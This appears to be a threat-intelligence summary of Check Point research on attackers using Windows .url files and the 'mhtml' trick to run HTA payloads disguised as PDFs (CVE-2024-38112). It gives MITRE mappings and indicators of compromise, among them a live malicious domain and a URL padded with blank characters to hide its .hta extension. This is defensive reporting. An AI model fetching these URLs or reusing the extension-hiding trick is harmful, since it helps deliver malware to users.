Check Point Research uncovered attackers using Windows .url shortcut files to lure victims into remote code execution via Internet Explorer. The attackers disguise an HTA payload as a PDF using the mhtml trick and hidden extensions, leading to patches for CVE-2024-38112. #CVE-2024-38112 #Mshta
Keypoints
- Threat actors are using .url files to exploit Windows users for remote code execution.
- The attacks leverage the retired Internet Explorer browser to bypass modern security measures.
- Attackers utilize the βmhtmlβ trick to disguise malicious URLs.
- Victims are misled into thinking they are opening PDF files, while they are actually executing .hta files.
- Check Point has released protections against these attacks and reported findings to Microsoft, leading to patches.
- Users are advised to be cautious with .url files from untrusted sources.
MITRE Techniques
- [T1203] Exploitation for Client Execution β Exploitation of vulnerabilities in applications to execute malicious code. βExploitation of vulnerabilities in applications to execute malicious code.β
- [T1204] User Execution β Users are tricked into executing malicious files, such as .hta files disguised as PDFs. βUsers are tricked into executing malicious files, such as .hta files disguised as PDFs.β
- [T1218.005] Mshta β Mshta is used to execute HTA content downloaded via the URL. βthe opened file is actually a malicious .hta file being downloaded and executed.β
- [T1036] Masquerading β Hiding malicious file extensions to evade detection. βHiding malicious file extensions to evade detection.β
Indicators of Compromise
- [Domain] β cbmelipilla.cl
- [URL] β http://cbmelipilla.cl/te/test1.html, https://cbmelipilla.cl/te/Books_A0UJKO.pdf%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80%E2%A0%80β¦hta
- [Hash] β bd710ee53ef3ad872f3f0678117050608a8e073c87045a06a86fb4a7f0e4eff0
- [Hash] β c9f58d96ec809a75679ec3c7a61eaaf3adbbeb6613d667257517bdc41ecca9ae